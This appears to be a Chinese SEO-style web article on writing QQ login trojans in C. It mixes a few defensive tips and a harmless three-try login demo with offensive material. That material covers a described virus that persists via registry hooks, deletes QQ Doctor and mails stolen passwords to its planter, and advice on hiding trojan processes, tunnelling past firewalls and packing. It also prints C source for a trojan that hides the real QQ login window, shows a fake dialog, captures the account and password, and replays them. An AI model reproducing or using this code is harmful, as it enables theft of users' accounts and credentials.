本篇文章给大家谈谈c语言制作QQ登录木马,以及c语言制作登录木马怎么办对应的知识点,希望对各位有所帮助,不要忘了收藏本站喔。
本文目录一览:
1、怎么制作qq木马2、c语言qq自动登录程序如何做3、用c语言编写一个QQ登陆的程序有3次机会4、要写一个简单的木马需要掌握哪些知识?
怎么制作qq木马
1.生成文件:
%sys32dir%\qqmm.vxd
2.生成CLSID组件
HKEY_CLASSES_ROOT\CLSID\
HKEY_CLASSES_ROOT\CLSID\ @ “”
HKEY_CLASSES_ROOT\CLSID\\InProcServer32
HKEY_CLASSES_ROOT\CLSID\\InProcServer32@ “C:\WINDOWS\system32\qqmm.vxd”
HKEY_CLASSES_ROOT\CLSID\\InProcServer32ThreadingModel “Apartment”
3.修改注册表,增加启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
4.病毒运行后会删除病毒源文件自身.
5.病毒运行后会把vxd文件注入到进程当中.
6.病毒运行后会删除QQ医生的执行文件QQDoctor\QQDoctor.exe
7.病毒运行后会登录h ttp://f***h. ch****en.c om/ip/ip.php网站来获得客户机器的IP地址.
8.病毒运行后会通过读取内存的方式截获客户QQ的账号,密码等相关资料.然后把获得的QQ的相关资料发送木马种植者的邮箱.
盗号原理
暴力破解
其实就是一个一个的去试。对付这种方法的途径很简单:使用比较复杂的密码。
本机安装木马窃听用户密码
对于这类木马软件,除了清除,还有一个办法——从原理上防止这些木马得到QQ的登录密码。
这些木马大多借助于密码查看器探知密码,首先要知道它是从哪个应用程式偷。判断方法如下:
①:从运行程式的档案名判断,比如程序QQ2000b是QQ程序。
应对策略
这种木马比较笨,对付它很容易,只要将QQ的主文件QQ.exe换个名字,它们就会变成瞎子。
②:查看当前运行的应用程式的标题是否是特征文字,如“QQ用户登录”。这类木马的例子如OICQ密码监听记录工具4.01。
应对策略
修改QQ的登录窗口的标题栏,这样木马就不能识别你正在登录QQ了。
判断方法3:根据密码域判断。
有些软件的胃口很大,它不只想窃听你的QQ密码,它还关心其他的一些密码,将获取的账户和密码分门别类,供自己分析。这类软件的危害极大,但是当前的介绍中,除了杀木马之外,好像没有较好的解决办法。
键盘记录
该木马会通过键盘自动记录用户的密码,并发送到指定的电子邮箱的路径。
判断方法:QQ登陆后不久异常下线,或自动关闭请求再次输入密码。
应对策略:打开密码输入框左侧的软键盘输入登陆密码。
c语言qq自动登录程序如何做
如果是其他的程序登陆,或许可以用用调用打开指定位置的程序,比如c的system(),然后输入start程序路径,然后就是获取窗口句柄,以及编辑框等空间,获取发送信息登陆,但是现在的qq版本的那些空间已经不能获取那些空间的id了,是画出来的,我以前试着要获取qq聊天信息框中的内容,但是不能获取里面的句柄
试试上面的方法,应该是不可以了,那就只有用获取窗口的位置,然后模拟鼠标键盘的操作来搞定了,至于输入账号,就用剪切板粘贴,上面所说的这些都是有api函数可以实现的,这是原理,具体的百度吧
用c语言编写一个QQ登陆的程序有3次机会
#include stdio.h
#include string.h
#define NAME “test”
#define PASSWORD “test”
int main()
{
char username[20],passwd[20];
int count=1;
while(1)
{
printf(“请输入用户名:”);
scanf(“%s”,username);
printf(“请输入密码:”);
scanf(“%s”,passwd);
if (strcmp(username,NAME)==0)
{
if(strcmp(passwd,PASSWORD)==0) {printf(“恭喜!登录成功!\n”);break;}
else
{
if(count3) { printf(“抱歉!密码输入错误!你还有%d次尝试的机会\n”,3-count); count++;}
else { printf(“抱歉!密码错误!你已经没有机会了!\n”); break;}
}
}
else
{
if(count3) {printf(“抱歉!用户名输入错误!你还有%d次尝试的机会\n”,3-count); count++;}
else { printf(“抱歉!密码错误!你已经没有机会了!\n”); break;}
}
}
return 0;
}
要写一个简单的木马需要掌握哪些知识?
1.良好的编程知识(C++,JAVA,delphi,VB也凑合,实在不行用易语言) 至少会一样吧
2.确定木马的功能.木马有很多种,示功能而定,比如盗号木马,远程控制木马(这类木马一般功能比较完美),网页木马(拿来黑网站用的),还有一些比如实现某一特殊功能的,.如DDOS攻击木马,控制类木马则还要编写主控端
3确定木马的连接方式,主动式和被动式(就是网上说的主动连接和反向连接)主动连接基本已经被淘汰了,
4,木马的隐藏,这是最大的问题也是最难的问题,如果你的木马不能隐藏那么也没就没有生存的余地.不仅仅是隐藏木马文件,进程,(这一般通过加载为系统服务或者通过DLL隐藏进程还有一些木马用驱动隐藏)还要隐藏木马的通信方式,不被防火墙阻止(如HTTP隧道)这里面的学问很多
5加壳,就是加密木马,还可以减少木马体积.
这里主要说下木马主体的编写方式
以最简单的盗QQ木马(阿拉QQ大盗)为例.
1.中马之后,先替换掉TXPlatform.exe(QQ密码保护文件)后台监视系统.如发现QQ.exe,则监视QQ两个文本框的text值,并将输入的信息保存,生成邮件.后台发送到种马人.这个很简单,难的再于如何替换TXPlatform.exe并且不被QQ.exe发现.还有就是如何才能取得QQ文本框中的两个值.
附送一份N年前的QQ盗号木马源程…仅做研究,这个是N年前的,用的不是我上面提到的方法,用的是把QQ的输入框替换为假的,然后密码自然而然的被木马给知道了.
BOOL processIdToName(LPTSTR lpszProcessName, DWORD PID)
{
HANDLE hSnapshot = C★reateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe;
pe.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hSnapshot, pe)) {
return FALSE;
}
while (Process32Next(hSnapshot, pe)) {
if (pe.th32ProcessID == PID) {
strcpy(lpszProcessName, pe.szExeFile);
return true;
}
}
return FALSE;
}
//查找QQ登录窗口
void QQFind()
{
HWND hWnd1 = NULL, qqID_hWnd = NULL, qqPass_hWnd = NULL;
HWND ButtonLogin = NULL, ButtonCancel = NULL;
c★har sTitle[255];
CString ss;
DWORD QQPID;
int LoginID;
BOOL find = FALSE;
do
{
//获得当前激活窗口的句柄
g_hWnd = GetForegroundWindow();
GetWindowThreadProcessId(g_hWnd, QQPID);
//根据PID获得进程名
processIdToName(sTitle, QQPID);
ss = sTitle;
ss.MakeLower();
//判断是否QQ
if(ss != “qq.exe”)
{
Sleep(100);
continue;
}
//获得标题文字,判断是否登陆对话框
SendMessage(g_hWnd,WM_GETTEXT,255,(LPARAM)sTitle);
ss = sTitle;
int n = ss.Find(“QQ”, 0);
int m = ss.Find(“登录”, 0);
if(n = 0 || m = 0)
{
//查找QQ登陆按钮的句柄
ButtonLogin = FindWindowEx(g_hWnd, ButtonLogin, “Button”, “登录”);
LoginID = GetDlgCtrlID(ButtonLogin);
ButtonLogin = FindWindowEx(g_hWnd, ButtonLogin, “Button”, “登录”);
LoginID = GetDlgCtrlID(ButtonLogin);
//获得QQ登陆按钮窗口位置
GetWindowRect(ButtonLogin, g_qqLogin);
//查找QQ取消按钮的句柄
ButtonCancel = FindWindowEx(g_hWnd, NULL, “Button”, “取消”);
//获得QQ取消按钮窗口位置
GetWindowRect(ButtonCancel, g_qqCancel);
//查找QQ密码输入框的句柄
hWnd1 = FindWindowEx(g_hWnd, NULL, “#32770”, NULL);
if(hWnd1 != NULL)
{
qqPass_hWnd = FindWindowEx(hWnd1, qqPass_hWnd, “Edit”, NULL);
//获得QQ密码输入框窗口位置
GetWindowRect(qqPass_hWnd, g_qqPassRt);
}
//查找QQ号码输入框的句柄
hWnd1 = FindWindowEx(g_hWnd, NULL, “ComboBox”, NULL);
if(hWnd1 != NULL)
{
qqID_hWnd = FindWindowEx(hWnd1, qqID_hWnd, “Edit”, NULL);
//获得QQ号码输入框窗口位置
GetWindowRect(qqID_hWnd, g_qqIDRt);
//获得当前默认QQ号码
SendMessage(qqID_hWnd,WM_GETTEXT, 255,(LPARAM)qqid);
}
//等待QQ窗口完全出现后抓取整个屏幕
Sleep(100);
g_DlgRt.left = 0;
g_DlgRt.top = 0;
g_DlgRt.right = m_xScreen;
g_DlgRt.bottom = m_yScreen;
g_pBitmap = CopyScreenToBitmap(g_DlgRt);
//设置QQ窗口为不可见
ShowWindow(g_hWnd, SW_HIDE);
//弹出我们创建的伪造对话框
HINSTANCE hInstance = GetModuleHandle(NULL);
DialogBoxParam(hInstance, (LPCTSTR)IDD_WIN847, 0, (DLGPROC)win847, 0);
//设置QQ窗口为可见
ShowWindow(g_hWnd, SW_SHOW);
//把QQ号码和密码填到真正的QQ登录窗口上,并模拟单击登陆按钮
SendMessage(qqID_hWnd, WM_SETTEXT, 0, (LPARAM)qqid);
SendMessage(qqPass_hWnd, WM_SETTEXT, 0, (LPARAM)qqpass);
SendMessage(ButtonLogin, BM_CLICK, 0, 0);
D★eleteObject(g_pBitmap);
//设置标志退出循环
find = true;
}
}
while(find == FALSE);
}
关于c语言制作QQ登录木马和c语言制作登录木马怎么办的介绍到此就结束了,不知道你从中找到你需要的信息了吗 ?如果你还想了解更多这方面的信息,记得收藏关注本站。
微信扫一扫 
支付宝扫一扫 
